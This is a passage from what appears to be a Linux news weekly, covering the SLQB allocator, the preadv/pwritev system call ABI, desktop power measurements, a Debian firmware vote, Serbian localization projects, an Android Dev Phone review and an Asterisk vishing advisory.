a request is made to allocate an object, the free list will be consulted
first.  When objects are freed, they are returned to this list.  Since this
list is part of a per-CPU data structure, objects normally remain on the
same processor, minimizing cache line bouncing.  More importantly, the
allocation decisions are all done per-CPU, with no bad cache behavior and
no locking required beyond the disabling of interrupts.  The free list is
managed as a stack, so allocation requests will return the most recently
freed objects; again, this approach is taken in an attempt to optimize
memory cache behavior.

SLQB gets its memory in the form of full pages from the page allocator.
When an allocation request is made and the free list is empty, SLQB will
allocate a new page and return an object from that page.  The remaining
space on the page is organized into a per-page free list (assuming the
objects are small enough to pack more than one onto a page, of course), and
the page is added to the partial list.  The other objects on the
page will be handed out in response to allocation requests, but only when
the free list is empty.  When the final object on a page is allocated, SLQB
will forget about the page - temporarily, at least.

Objects are, when freed, added to freelist.  It is easy to foresee
that this list could grow to be quite large after a burst of system
activity.  Allowing 
freelist to grow without bound would risk tying up a lot of system
memory doing 
nothing while it is possibly needed elsewhere.  So, once the size of the
free list passes a watermark (or when the page allocator starts asking for
help freeing memory), objects in the free list will be flushed back to
their containing pages.  Any partial pages which are completely filled with
freed objects will then be returned back to the page allocator for use
elsewhere.

There is an interesting situation which arises here, though: remember that
SLQB is fundamentally a per-CPU allocator.  But there is nothing that
requires objects to be freed on the same CPU which allocated them.  Indeed,
for suitably long-lived objects on a system with many processors, it
becomes probable that objects will be freed on a different CPU.  That
processor does not know anything about the partial pages those objects were
allocated from, and, thus, cannot free them.  So a different approach has
to be taken.

That approach involves the maintenance of two more object lists, called
rlist 
and remote_free.  When the allocator tries to flush a
"remote" object (one allocated on a different CPU) from its local
freelist, it will simply move that object over to rlist.
Occasionally, the allocator will reach across CPUs to take the objects from
its local rlist and put them on remote_free list of the
CPU which initially allocated those objects.  That CPU can then choose to
reuse the objects or free them back to their containing pages.

The cross-CPU list operation clearly requires locking, so a spinlock
protects remote_free.  Working with the remote_free lists
too often would thus risk cache line bouncing and lock contention, both of
which are not helpful when scalability is a goal.  That is why processors
accumulate a group of objects in their local rlist before adding
the entire list, in a single operation, to the appropriate
remote_free list.  On top of that, the allocator does not often
check for 
objects in its local remote_free list.  Instead, objects are
allowed to accumulate there until a watermark is exceeded, at which point
whichever processor added the final objects will set the
remote_free_check flag.  The processor owning the
remote_free list will only check that list when this flag is set,
with the result that  the management of the
remote_free list can be done with little in the way of lock or
cache line contention.

The SLQB code is relatively new, and is likely to need a considerable
amount of work before it may find its way into the mainline.  Nick claims
benchmark results which are roughly comparable with those obtained using
the other allocators.  But "roughly comparable" will not, by itself, be
enough to motivate the addition of yet another memory allocator.  So
pushing SLQB beyond comparable and toward "clearly better" is likely to be
Nick's next task.

		System calls and 64-bit architectures


Adding a system call to the kernel is never done lightly.  It is important
to get it right before it gets merged because, once that happens, it
must be maintained as part of the kernel's binary interface forever.  The
proposal to add preadv()
and pwritev() system calls provides an excellent example of
the kinds of concerns that need to be addressed when adding to the kernel
ABI.


The two system calls themselves are quite straightforward.  Essentially,
they combine the existing pread() and readv() calls
(along with 
the write variants of course) into
a way to do scatter/gather I/O at a particular offset in the file.  Like
pread(), the current file position is
unaffected.  The calls, which are available on various BSD systems, can be
used to avoid races between an lseek() call and a read or
write.  Currently, applications must do some kind of locking to prevent
multiple threads from stepping on each other when doing this kind of I/O.


The prototypes for the functions look much like readv/writev, simply adding
the offset as the final parameter: 

But, because off_t is a 64-bit quantity, this causes problems on
some architectures due to the way system call arguments are
passed.  After Gerd Hoffmann posted version 2
of the patchset, Matthew Wilcox was quick to point out a problem:

Are these prototypes required?  MIPS and PARISC will need wrappers to
fix them if they are.  These two architectures have an ABI which
requires 64-bit arguments to be passed in aligned pairs of registers,
but glibc doesn't know that (and given the existence of syscall(3),
can't do much about it even if it knew), so some of the arguments end up
in the wrong registers.


Several other architectures (ARM, PowerPC, s390, ...) have similar
constraints.  Because the offset is the fourth argument, it gets placed in
the r3 and r4 32-bit registers, but some architectures need it in either
r2/r3 or r4/r5.  This led some to advocate reordering the
parameters, putting the offset before iovcnt to avoid the
problem.  As long as that change doesn't bubble out to user space, Hoffmann
is amenable to making the change:
"I'd *really* hate it to have the same system call with different 
argument ordering on different systems though".


Most seemed to agree that the user-space interface as presented by glibc
should match what the BSDs provide.  It causes too many headaches for folks
trying to write standards or portable code otherwise.  To fix the
alignment problem, the system call itself has the reordered version of the
arguments.  That led 
to Hoffmann's third version of the
patchset, which still didn't solve the whole problem.


There are multiple architectures that have both 32 and 64-bit versions and
the 64-bit kernel must support system calls from 32-bit user-space
programs.  Those programs will put 64-bit arguments into two registers,
but the 64-bit kernel will expect that argument in a single register.
Because of this, Arnd Bergmann recommended
splitting the offset into two arguments, one for the high 32 bits and
one for the low: "This is the only way I can see that lets us use a
shared compat_sys_preadv/pwritev across all 64 bit architectures".


When a 32-bit user-space program makes a system call on a 64-bit system,
the compat_sys_* version is used to handle differences in the data
sizes.  If a pointer to a structure is passed to a system call, and that
structure has a different representation in 32-bits than it does in
64-bits, the compat layer makes the translation.  Because
different 64-bit architectures do things differently in terms of calling
conventions and alignment requirements, the only way to share
compat code is to remove the 64-bit quantity from the system call
interface entirely.


That just leaves one final problem to overcome: endian-ness.  As Ralf
Baechle notes, MIPS can be either little or
big-endian, so the compat_sys_preadv/pwritev() needs
to put the two 32-bit offset values together in the proper way.  He
recommended moving the MIPS-specific merge_64() macro into a common
compat.h include file, which could then be used by the common
compat routines.  So far, version 4 of the patchset has not
emerged, but one suspects that the offset argument splitting and use of
merge_64() will be part of it.


The implementation of the operation of preadv() and
pwritev() is very obvious, certainly in comparison to the
intricacies of passing its arguments.  The VFS implementations of
readv()/writev() already take an offset argument, so it
was simply a matter of calling those.  It is interesting to note that as
part of the review, Christoph Hellwig spotted a
bug in the existing compat_sys_readv/writev() implementations
which would lead to accounting information not being updated for those
calls. 


This is not the first time these system calls have been proposed; way back
in 2005, we looked at some
patches from Badari Pulavarty that added them.  Other than a brief
appearance in the -mm tree, they seem to have faded away.
Even if this edition of preadv() and pwritev() do not make
it into the 
mainline—so far there are no indications that they
won't—the code review surrounding it was certainly useful.  Getting a
glimpse of the complexities around 64-bit quantities being passed to system
calls was quite informative as well.


		Profiling the Power Usage of a Desktop PC


Reducing the power usage of a desktop computer can bring about a number of
benefits. Whether your goal is to save money on your power bill,
reduce your carbon footprint or eliminate unwanted heat and noise from
your office, a bit of effort can produce a more power-efficient computer.
Effort spent reducing power can have an even larger effect on servers and
other machines that run 24 hours a day compared to machines that are
only on during work hours.
This work was done on a nearly ten year old PC, but the process still
applies to more modern hardware.


The test setup consisted of an opened-up desktop PC, a P3 International
Kill-a-watt
meter and a collection of peripheral cards and disk drives.
The Kill-a-watt has a 1W resolution, if a reading alternated between
2 values such as 8 and 9 Watts, the estimated value was called 8.5 Watts.
Some of the measurements made were small enough that they were
"in the noise".  Other variables included devices with inconsistent
power usage and inconsistent line voltage.
The resulting measurements were actual power used by the power supply,
this may vary from the DC power used by the tested components.
Lastly, the Kill-a-watt meter also shows
power factor;
a fairly consistent value of 0.67 was read.


The tests were performed on the machine while it was in a
number of different software states.  Many of the tests were
done while at the BIOS prompt, disk drive and network adapter
tests were done while the machine was running Linux (Ubuntu 8.10).
Power consumed by external devices such as the LCD video monitor and
amplified speakers was not taken into account.
When a peripheral such as a disk drive was removed for a test, the
drive was disconnected from power and the interface cable was removed
to eliminate possible power consumption by bus termination resistors.


The tested computer used a fairly old, but still adequate Asus A7V333
motherboard with an AMD Athlon 1700 processor clocked at 1466 Mhz.
The RAID option was not present on the motherboard.  A pair of 256MB PC2700
DIMMs were used for the memory.  The power supply was a 300W Antec PP-303X.
Initially, the machine was loaded down with two hard drives, both
CDR and DVD-RW drives, a floppy drive, an AGP video card with
an ATI Radeon 8500
GPU, and both wired and wireless 802.11 networking cards.


The machine was shut down, all of the PCI and AGP cards were removed
and the disks were disconnected.  The first power test involved the PC2700
memory DIMMs.  With no memory, power consumption was 72 Watts.  Adding
one DIMM caused the power to drop to 67 Watts.  Your author guesses
that with no memory, the CPU runs in some kind of power-consuming
loop.  Interestingly, the two DIMMs had significantly different power
usage.  The Kensington Value Ram with Hynix chips caused the machine to
use 73 Watts versus 67 Watts with the generic Chinese RAM with unbranded chips.  With both DIMMS installed, power consumption as 75 Watts.
We can deduce that the Kensington RAM used 8 Watts while the Chinese
RAM used 2 Watts. Sufficient RAM is critical for good system performance,
the brand seems to be significant in the area of power usage.  Tests with
additional brands of memory seem to be in order.


Fans consume a fair amount of power.  A quick unplugging of the noisy
CPU fan caused the power to go from 75 Watts to 72 Watts, the CPU
would melt down without this 3 Watt component, so it was left in place.
It may be possible to find a more efficient CPU fan.
The case had a front-mounted "push fan".  This consumed around 2 Watts
of power.  The power supply's built-in fan provides plenty of air
circulation so the front fan was disconnected.  This also made the
machine a bit quieter.


The floppy drive is virtually useless now that 4GB USB memory sticks
can be purchased for under $10.  The floppy drive consumes about one half
Watt of power, so the savings are small.  But big savings can come from
many small cuts, so the device was left unplugged.
The Asus CD-S500/A CDR drive was tested, it consumed about 1 Watt of power.
The Sony CRX320E DVD-RW drive was tested, it consumed about  2 Watts of
power.  Most people can get by with a single removable media drive,
or none at all. The DVD-RW drive would be the obvious choice for a
single-drive system.  If one can put up with the occasional inconvenience
of rebooting, it should be possible to put a DPDT power switch
on the back of the machine to allow shutting off the +5V and +12V
lines to the removable media drive.  All together, the floppy and two
optical drives consumed around 3.5W when idle.


The Radeon 8200 video card was somewhat of a power hog, it consumed
around 8 Watts of power with no built-in fan.
A lower performance ATI-S3 AGP video card consumed 4 Watts.
If high performance video operation is not critical,
example: running 
Google Earth, the S3 card should be sufficient.  As with sufficient
memory, this sacrifice may not be worth the power savings.


The next part of the power test involved the fixed disk drives.
The main boot device was a Western Digital WD600 60GB PATA disk.
It consumed about 7 Watts of power at the BIOS prompt, power went up
by about 5 Watts when the system was running Linux and the drive
was active.  Some of this power is likely being consumed by the CPU
and memory and some is used to power the disk's head actuator motor.
An auxiliary Western Digital WD2500 250GB SATA drive and
associated SATA PCI adapter card consumed around 9 Watts of power when
idle and also about 5 watts more when active.  Interestingly,
as the machine was more heavily loaded with drives and peripherals,
system usage became less of a variable to overall power consumption.
Hard drives are one of the more power hungry devices
in a system, putting all of your data on a single drive is a good way
to save power.


A generic-brand 10/100 Ethernet controller with an Intel chip consumed
about 1 Watt of power at the BIOS level.  Running Linux and moving
a lot of data across the card caused the power consumption to jump
by about 8 Watts, as with the disk drive test, a lot of that increase
is likely caused by CPU and memory use.  A Hawking Technology HWP54G
802.11 wireless Ethernet card also consumed about 1 Watt when idle
and a few watts more when busy.


The fully loaded system with 512MB of RAM, two hard drives, two optical
drives, two network adapters, the Radeon video the floppy disk drive
and the front fan consumed about 108 Watts of power when idle and a
similar amount when busy.
When the machine was stripped down to one hard drive, no optical or
floppy drives, the lower performance S3 video card and no front fan,
its power dropped to 80 Watts idle and 88 Watts when busy, or between
74 and 81 percent of the original power consumption.
This is enough of a reduction in power usage to justify the effort of
testing.


Don't forget that even when it is completely powered down, the computer
may still act as a 
phantom load, this system consumed a full 3 Watts when it was
off.  An easy remedy to that problem is to route the power plugs for the
CPU, video monitor and speaker through a switched power strip.


		Debian goes to the polls


It is general resolution season at the Debian Project.  As was discussed here in October,
Debian seeks to resolve two questions: one regarding types of developers in
the project, and one being the perennial firmware debate.  As of this
writing, the first vote is done, while the second remains open.  But it has
become clear that, regardless of the outcome of the firmware vote, this
issue has stressed the Debian community, perhaps to the breaking point.

Taking the easier subject first: Joerg Jaspert's proposal to create new
classes of Debian developers was always going to be controversial.  The
real purpose of the
associated general resolution was to put the brake on those changes.
That purpose was fulfilled; the winning choice in that (low-turnout) vote
was "Invite the DAM to further discuss until vote or consensus, leading to
a new proposal."  So the project will go back to doing one of the things it
excels at: talking.  What form the membership proposal will have when it
re-emerges from discussion - if it ever does - is unclear.

The other vote - open until December 21 - is essentially about whether the
upcoming "Lenny" release will be delayed until all known violations of the
Debian Free Software Guidelines have been resolved - and whether firmware
blobs in the kernel count as such violations.  The question being asked is
not so simple, though; in fact, Debian developers have no less than seven
different options to vote upon.  The nature of this ballot, how it was
constructed, and how it will be decided has led to significant acrimony
within the project.

It is worth looking at what the seven options are (with the actual ballot
text in bold):


 Reaffirm the Social Contract.  The titling of this option is 
     somewhat controversial - all Debian developers committed to supporting
     the Social Contract before gaining their status.  What this option
     really means is "delay the Lenny release until all DFSG violations
     known on November 1, 2008 have been resolved."

 Allow Lenny to release with proprietary firmware.  This option
     allows the Lenny release to happen, as long as no new firmware blobs
     make their way into the distribution.  The language here is quite
     similar to what has been found in the resolutions allowing the Sarge
     and Etch releases to happen despite ongoing firmware concerns.  This
     option has been deemed by project secretary Manoj Srivastava to
     require a three-to-one supermajority vote to pass.

 Allow Lenny to release with DFSG violations.  This choice, also
     requiring a supermajority, has almost the same effect as
     option 2.

 Empower the release team to decide about allowing DFSG
     violations.  Here, the project (again, with a supermajority) would
     say that it trusts the release team to make the right decisions.  The
     team is currently working toward a release which includes firmware,
     so, again, the end result would be about the same: allow the Lenny
     release process to go ahead.

 Assume blobs comply with GPL unless proven otherwise.  The
     actual text of this choice does not mention the GPL at all; in fact,
     it reads very much like options 2 and 3.  However, this one
     was not deemed to require a supermajority vote.

 Exclude source requirements for firmware.  This option (which
     requires a supermajority) says that, for all practical purposes,
     firmware is not software and, thus, a corresponding source
     distribution is not required.

 Further discussion.  This outcome seems inevitable regardless
     of how the developers vote.  If it were to win, though, then the
     outcome of this general resolution would be to decide nothing.


See this posting for the full text of all
seven options.

So why are many Debian developers unhappy with this ballot?  There would
appear to be a few reasons, the first of which being the long list of
options.  Some developers would have rather seen a simple "can Lenny
release or not?" vote, with related issues being handled in a separate
resolution.

The titles given to some of the choices are seen by some as deceptive.  
"Reaffirm the Social Contract" really means "delay Lenny," and "Assume
blobs comply with GPL" goes with a resolution that never mentions the GPL
at all.  Developers who are unhappy with a long, messy ballot are even less
happy with option titles which seem confusing at best, or deceptive at
worst.

Then, there is the matter of the supermajority requirements.  Some
developers wonder why option 2
requires a three-to-one vote, while an almost identical resolution for Etch
did not require a supermajority in 2006.  The decision on majority
requirements is made entirely by the project secretary, who has the task of
determining whether a given resolution "overrides a foundation document" or
not.  A few developers have made the claim that Manoj's decisions are based
less on clear understanding of what really "overrides a foundation
document" and more with the goal of ensuring that his own favored outcome
wins.

That last is, needless to say, a strong charge.  As it happens, Manoj is
the proposer of the "assume blobs comply with GPL" option; he also seconded
options 1 and 2.  Two of the options he has publicly supported do
not have the supermajority requirement attached to them, so,
perhaps, one could argue that Manoj is, indeed, trying to rig the vote.  On
the other hand, those two options conflict with each other: one would delay
Lenny indefinitely, the other would wave the firmware problem away.  So if
this is an attempt to steal an election, it is one with a highly uncertain
outcome, even if it is successful.  The more straightforward interpretation
- that a long-serving project secretary is interpreting the project's
constitution to the best of his understanding, ability, and good faith - would seem to
be the more likely alternative.

Still, that has not prevented a discussion involving statements like this:


	Recognizing the validity of the vote is not a "must".  The
	alternative is that we end up in a state of constitutional crisis.
	That's unfortunate, but it's also unfortunate that our Secretary is
	failing to act in a manner that safeguards the integrity of that
	office.


Other, more reasoned - but still unhappy - voices are pondering the
replacement of the project secretary.  It turns out that how to do that is
not entirely clear, though.  Some others have asked project leader Steve
McIntyre - who has been conspicuously quiet in this whole discussion - to
intervene.  He finally responded this way:


	I've been talking with Manoj already, in private to try and avoid
	flaming. I specifically asked him to delay this vote until the
	numerous problems with it were fixed, and it was started
	anyway. I'm *really* not happy with that, and I'm following through
	now.


What "following through" means remains unclear.  The Debian project leader
does not command vast powers which can be brought to bear on a problem like
this.  Debian is an exceptional project in that it operates in a democratic
mode under a formal constitution.  Unlike many other projects, Debian lacks
a benevolent dictator or a backing corporation with the ability to force a
decision.  So we do not know what Steve will be able to do to resolve this
issue. 

What we do know is that quite a few developers are going to be unhappy with
this vote regardless of how it comes out.  Talk of "constitutional crisis"
is almost certainly overblown; Debian has muddled its way through no end of
strong disagreements in the past.  But that still leaves a lot of room for
public conflict which further diminishes Debian's reputation and further
delays the Lenny release.  What one can hope is that, somehow, the project
will manage to muddle through to an understanding on firmware that can
prevent all this from happening yet again when the next major release cycle
comes near to completion.

		Localization under a government umbrella


In an era of wider governmental adoption of free software, the Serbian authorities decided
to take a different approach toward the affirmation of GNU/Linux and free
software in the business sector and the general public.  Instead of direct
adoption of free software and open standards, Serbian authorities decided
to fund several localization projects with the goal of helping to improve
the competitiveness of free software on the Serbian IT market.

The first information about the government's plans to help the localization
of Free Software appeared in December 2007, when several of the Serbian
media reported about the issue. Shortly after the news was revealed, the
official press
release (Google cached page, since the site was changed with no
resources in English at the moment) from the Serbian Ministry of
Telecommunications and Information Society was published, giving all the
details that were available to the public at the moment.

In short, February was set as a deadline for the first results, which meant
localized versions of Ubuntu, Fedora, Mozilla Firefox, Thunderbird and
OpenOffice.org. The projects were funded by the ministry and delegated to the
several Serbian computer science faculties for organization and
implementation. All of them, except the Ubuntu localization team, showed
their first results in March at a presentation organized by the
ministry. Ubuntu was late since the localized version was planned for the
LTS (Long term support) release which came out in April. Shortly after
Ubuntu 8.04 was released localized Ubuntu ISOs appeared on project
servers.

Ubuntu was known as a distribution which didn't have a localized installer
or characteristic Ubuntu software translated in Serbian. In order to
provide better localization, people from Faculty of Electrical engineering
in Belgrade forked Ubuntu and named the new distribution
cp6Linux. Cp6Linux was recognized as
symbolic way to write "SerbLinux" since cp6 can be understood as "Serb" in
something that might be considered as Cyrillic "leatspeak".  The
development team never confirmed this though.  "Linux for human
beings who speak (only) Serbian" is packaged in three flavors: Home,
School and Business.  Beside this way of packaging, the cp6 development
team customized visual identity and adopted a user interface to make it
more friendly for users coming from Windows.

The most important task and the purpose of cp6's existence is not entirely
completed, but the situation compared to a vanilla Ubuntu installation is a
lot better.  The live disk bootstrap interface and the live system
installer are translated into Serbian.  System tools and package managers
are also localized, but translations of package descriptions and
configuration messages are missing.  The graphical configuration tools
shipped with Ubuntu, like restricted-manager, are translated too, so it
seems that cp6 2008 (which is the first and so far the only version) is
basically targeting localization of the GUI applications and tools.  The cp6 team produced a
52-page Creative Commons licensed User manual (CC-NC-SA), covering the most
important features in using and installing cp6Linux 2008.

The Fedora localization
team (Google
translation) took different strategy and decided to produce localized
flavors of Fedora, with no forks and branding. The Serbian Fedora
localization community was quite well organized and productive before, so
the first thing that people for Faculty of Organization Sciences in
Belgrade did was getting in touch with translators who already worked on
Fedora. According to them, 19416 of 32480 strings in total were localized
already, and they've localized 98% of 19500 unlocalized strings, which
leads us to the total score of 99% localized strings.

Almost 100% of localization strings in real life mean localized
configuration tools, package management GUIs and installation interface.
YUM and package descriptions, similar to cp6Linux, remain untranslated.
Most of the work was done on Fedora 8, which is available for download from
project servers, with Serbian localization and settings out of the box.
There is no information about ISOs or localization details for Fedora 9 or
10 on the project website.

Mozilla products were localized by the people from Electronic Faculty in
Niš. As in the case of Fedora, project organizations continued existing
efforts.  The final result, for GNU/Linux and Windows, are Cyrillic and
Latin versions available for download from the project website (Firefox
2.0.0.12 and Thunderbird 2.0.0.9).

Back in Belgrade, localization of OpenOffice.org was delegated to The
Faculty of Mathematics. Again, the project continued existing efforts and
took over the coordination of the official Serbian translation team.  The
first steps toward a localized OpenOffice.org dated back to 2001 when a
group of Serbian free software users got together for a big translation
marathon organized by ICT Tower, a local OSS oriented software company.
Sadly, without any external support, they failed to keep interest in the
project and translations were never updated.  The second big push was in
the summer of 2005 when Novell gave some money to the "prevod.org" group
for improving Serbian localization in SUSE.  Following the OpenOffice
release 2 "prevod.org" members returned to keeping up with GNOME
translations, and once again the OpenOffice.org translation was left
unmaintained.  

"In December 2008 the Ministry of telecommunications and information
society Republic of Serbia started four projects for free software
localization." explains Goran Rakic, Serbian OpenOffice.org native
language project lead.  According to Rakic, the biggest achievements of the
project are localized releases of 2.4, 2.4.1 and 3.0 with
continuity. "We did large QA and localization quality is better then
ever", he states.  Project statistics show distribution of more than
30,000 localized installations via the project site and more than 3000 in
just one week after the 3.0 release. Rakic reveals that localized OOo is
used inside government too, with some large deployments and many more to
go.  Rakic looks into the future saying that the "Ministry and Faculty
of Mathematics in Belgrade signed contract for three years with option to
extend and we are just one year in it.  I can say that future looks bright
for all current and new OpenOffice.org users in Serbia."

It is very hard to give a general conclusion about the implementation and
impact of these projects. First of all, the public was never informed of
any study related to the use of localized versions of any software in
Serbia.  So it's impossible to predict how many users might directly
benefit from those activities.  The only numbers that we can use for any
sort of analysis are download statistics, which doesn't necessarily reflect
the real amount of acceptance or everyday use of localized programs and
distributions.

Contributions and translations from the Faculty of Organization
Sciences have gone upstream, and cooperation with the Fedora translation
team seems to be established and functioning according to the information
on the Serbian
team page. On the contrary, it seems that the Cp6Linux translations
didn't go upstream, since there are no noted contributions on Launchpad.
As in the case of Fedora, communication and cooperation is managed on the Serbian Mozilla localization
team wiki.  OpenOffice is the only project that actually took over
coordination of the localization team, at least officially.  Speaking of
distributions, in both cases GNOME is being used as the default desktop
environment, which has a strong and devoted localization community whose
work was packaged in cp6Linux and Fedora in Serbian. GNOME translation is
not a part of government funded activities, though.

In the meantime, the Faculty of Technical Sciences from Novi Sad started to
work on Alfresco localization, and the results are available on the Alfresco Forge
page.

This non-typical approach to free software from the government was
motivated by the expectation that localization will become another
recommendation for the Free Software adoption in Serbia.  According to Mr.
Nebojša Vasiljevic, assistant of the Minister of Telecommunications
and Information Society for Information society, in his interview for
GNUzilla magazine (issue 36).  He also said that those project are not part
of any strategy involving switching to free software in governmental
institutions.

		The Android Dev Phone 1


Your editor's long-suffering spouse will attest that gadgets are never in
short supply in the house.  Many of them pass below her interest, but a new
one has come in which has attracted attention throughout the household: an
Android Dev
Phone, otherwise known as the fully unlocked version of the G1 
phone offered by T-Mobile.  This phone is certainly a fun toy, but it has
the potential to be a lot more than that.


The details of this device have been well publicized for a while now.  It
includes a nice touchscreen display, QWERTY keyboard, GPS receiver,
accelerometer, 3.2 megapixel camera, and more.  The whole thing is
powered by Google's Linux-based Android platform.  The Dev Phone is
essentially the same device as that sold by T-Mobile, but with a crucially
important difference: it is unlocked in all senses.  This means not just
that it can be used with any mobile carrier's SIM, but also that the base
operating software has not been locked down.  This is a phone for which the
entire system can be rebuilt and replaced at will.

The Dev Phone thus joins the OpenMoko Neo Freerunner on the very short list
of truly open mobile handsets.  This device, though, has the advantage of
being a bit more of a finished product with what appears to be a rather
stronger software development team behind it.  It also, for what it's
worth, has some nice hardware capabilities that the Neo lacks: quad-band
GSM, 3G (though not on the bands used by your editor's carrier, alas),
keyboard, etc.  Your editor believes that it will be a successful product.


Over the course of the next few months, your editor plans to dig into this
device and report on what he finds.  How open is the device really?  What does
it take to put a new kernel onto it?  What might it take to put a different
operating system onto it altogether?  And, in general, how does this whole
Android thing work?  Assuming that he does not brick the device early on,
your editor hopes to get a real sense for what can be done with this
device, how close its software is to what we normally think of as Linux,
and where it might go into the future.  It should be a fun project.


First, though, one has to get through the stage of simply playing with the
new toy.  So the rest of this article will be a user-level review of
sorts.


The hardware: it feels generally solid.  The device is larger and heavier
than handsets your editor has used in the past, but that is to be
expected.  The keyboard works better than one might think given its size; even your
relatively fat-fingered editor is able to type with reasonable speed and
accuracy.  The vibrator lacks strength.  The camera seems to take nice
photos (for a phone camera), but it is exceedingly slow.  As with most color-screen
devices, the display is entirely unreadable when the backlight is off.  A
nice touch with this phone is an indicator LED which blinks when the phone
has something to tell you - an unread text message, for example - but the
use of the LED seems to be somewhat inconsistent.  


Your editor has yet to get a sense for what the battery life would be in
the absence of children playing with the device all day long.  Complaints
about battery life can be found on the net, but it appears that the phone
should be able to get through two or three days of moderate usage where the
GPS receiver is off most of the time.  On the other hand, if you let your
kids use it to mess around on video sites, the battery runs down relatively
quickly.


On the software side, this phone gets off to a bit of a rough start.  It
first requires the user to configure the phone to access data service from
the carrier, a process which must be done by hand if that carrier is not
T-Mobile.  Your editor's last new phone recognized the carrier from the SIM
and handled this task automatically.  More annoying, though, is that the
phone requires the creation of a Gmail account as part of its setup
process.  The fact that one does not have - and does not want - such an
account is not relevant.  So now your editor has an entry in the Gmail
account database which will never be used.

That, of course, ties in to why Google has gotten into this exercise in the
first place.  There are many features of the Android platform which are
designed to tie the user in more closely to services provided by Google.
Some features, such as the calendar, are really just an extension of the
online offerings.  The phone wants to sync the contacts list
to...somewhere...and turning the feature off leads to unpleasant behavior. 
It is possible to use many of the features of the device without
connecting back to the Google mother ship, but it's not the natural mode of
operation.

Another example is email handling.  There is a separate icon for Gmail which
just works; that application offers the features (such as threading)
provided by that service.  One can run a different mail application to
connect to a POP or IMAP account somewhere, but it's a separate setup
process.  Later, with luck, one discovers the improved K9 client, which must be
installed separately and which requires one to go through the setup process
again.  Even with K9, the non-Gmail mail client is not what it should be.
There is no threading of messages, many basic commands (refiling messages,
for example) are missing, etc.  Then there's little problems like refusing
to connect to a server if it doesn't think it can trust the SSL certificate
and failing to authenticate if the user's password contains special
characters.  One assumes that this client will improve,
or that other clients will be ported to the platform, but, for now, it
doesn't seem to be a priority for the Android developers.


More generally, though, the Android software is pretty slick.  A fair amount of
thought has been given to how interaction should work on this kind of
device.  Once one gets used to a few specific differences (holding a finger
on an item on the screen for a few seconds often brings up otherwise hidden
options, for example), navigating through applications comes fairly
naturally.  Only in some cases do inconsistencies pop up - some
applications have different notions for how to zoom in and out than others
is one that your editor has noticed.  As a whole, the interface comes
across as polished and attractive.


That said, use of the display could be improved.  On a small display, there will
always be a certain tension between getting enough information on-screen
and avoiding the creation of headaches through severe eye strain.
Different users will do better with small fonts than others.  But if
Android offers an option to configure default font sizes, your editor
cannot find it.  So it becomes necessary to manually zoom almost every web
page, almost every email, etc. to get a sufficient amount of information
onto the screen.  That gets a little tiresome after a while.

The "Android Market" offers a wealth of applications, most of which are
available as free software or, at least, in a free-beer mode.  When
browsing applications, one runs into the Android security model, which is
oriented around a
long set of capabilities which can be granted to applications.  A
program which needs do things like access the net, obtain location data,
change hardware settings, etc. must declare the capabilities it needs;
these are then presented to the user at installation time.  Most users will
probably just say "yes," but it is worth taking a closer look.  Your editor
decided to decline the installation of a Mahjongg game after being unable
to figure out why it was asking for full network access.


Beyond the inevitable games (including one of the worst Tetris
implementations seen in a while), there is a wide variety of available
applications.  The "Locale"
tool makes up for the (surprising) lack of the sort of "profile" feature
found on almost every handset your editor has ever seen; it performs tricks
like using the GPS

 
receiver to automatically change profiles when the phone enters the office
or a theater.  The "bubble" application (shown on the left) turns the
handset into a portable 
level.  There's no shortage of "smart shopper" applications, most of which
can read a barcode using the camera and look up prices for items.  There is
a "power manager" which attempts to configure the device for optimal power
use in a number of situations; it provides a basic profile functionality as
well, though the user should be prepared to spend some time configuring the
options into a workable form.
There's plenty of travel-oriented applications which will fetch weather
reports, currency rates, or call a taxi.  


One notable omission, with both the base phone and the available
applications, is voice over IP functionality.  This handset should be able
to do VOIP beautifully, but almost no such functionality is available.
There appears to be a tool for Skype users, but that's about it.


There are a couple of applications that are of particular interest to your
editor.  ConnectBot is
an SSH client which works surprisingly well; the developers are clearly
working toward the creation of a tool useful for people logging into
Linux-like systems.  And the terminal emulator provides that all-important
feature: a shell prompt on the device.  Even more fun, on the Dev Phone, a
simple "su" with no password will yield a root shell.

Playing around on the device, your editor sees that the ARM processor
provides a mighty 383 bogomips.  It appears to have a little over 100MB of
usable memory.  It's running a 2.6.25 kernel (known to be heavily modified)
with a single loadable module called "wlan."  And so on.  As useful as the
keyboard is, trying to use it to type commands at a shell which lacks a
history mechanism gets painful after a while.  Time to go looking for an
SSH server.

There are other useful applications, of course, such as the one which actually
makes phone calls.  Like the others, it lacks perfection, but one can only
assume that, on a platform driven by free software, that imperfect
applications will be improved or replaced.  How easy it is to do such
things is part of what your editor intends to find out in the coming
months.  Stay tuned.

		"Vishing" advisory targets Asterisk


A light-on-details warning—issued late on a Friday no less—had
users of the Asterisk telephony
platform scrambling recently.  It was issued by a US government group that
includes the FBI, which tends to attract attention, and warned of unspecified
vulnerabilities that would allow "vishing" attacks using subverted Asterisk
systems.  Vishing is a relatively new scam that uses phone calls in
phishing expeditions (the name comes from combining 'voice' with
'phishing'), but typically using systems that are owned and run by the
scammers.


Evidently, the FBI received word that Asterisk systems were being subverted
by way of a vulnerability (AST-2008-003)
reported last March.  Systems were 
then used to make "thousands of vishing telephone calls [...]
within one hour" trying to elicit 
personal information—generally credit card numbers—from victims.  
 By using caller ID spoofing techniques those calls
could appear to be coming from the credit card company itself.
Typically, a 
pre-recorded message would give the user another number to call, where they
would be prompted to enter the information via an interactive voice
response (IVR) interface.


Asterisk is a multi-purpose free software suite that can act as a public private branch
exchange (PBX), handle VoIP traffic, do IVR, and more.  Because it provides
such a general purpose platform, it does make an attractive target.
It is probably also enticing to control such a device that is being run
by—and can be traced to—someone else.  But the folks at
Digium—original developers and primary maintainers of
Asterisk—don't 
really think the 
problem is as bad as was indicated.


The original problem was fixed months ago, so it clearly irks the Digium
folks that it has been fingered now.  In addition, the original advisory
didn't even point to the vulnerability so users and Digium were left to
guess what exactly was being exploited.  The advisory was updated
to include information about AST-2008-003, but there is still some
skepticism about the potential for exploitation.
On Digium's blog, community manager John Todd thinks
the problem was overstated: 

While I won't get into the details of configuration specifics, I would say
that an administrator would have to consciously configure their system in
what I believe to be an extremely unusual way in order to be victimized by
this particular vulnerability.  The flexibility of Asterisk lets a
developer do almost anything, but it seems that there would need to be an
almost absurd configuration circumstance that would allow this bug to be
harmful in the way described.


While it may well be that this particular vulnerability is difficult to
exploit, there will likely be others down the road that are less so.  While
some users may be getting a little more wary about phishing and email-based
scams in general, phone calls have generally been considered more trustworthy.
But it is no longer true that phone numbers are definitely traceable back to 
a physical location with a billed party known by the telephone company.  Much
of this information can be spoofed or re-routed in ways that make detection 
more difficult.


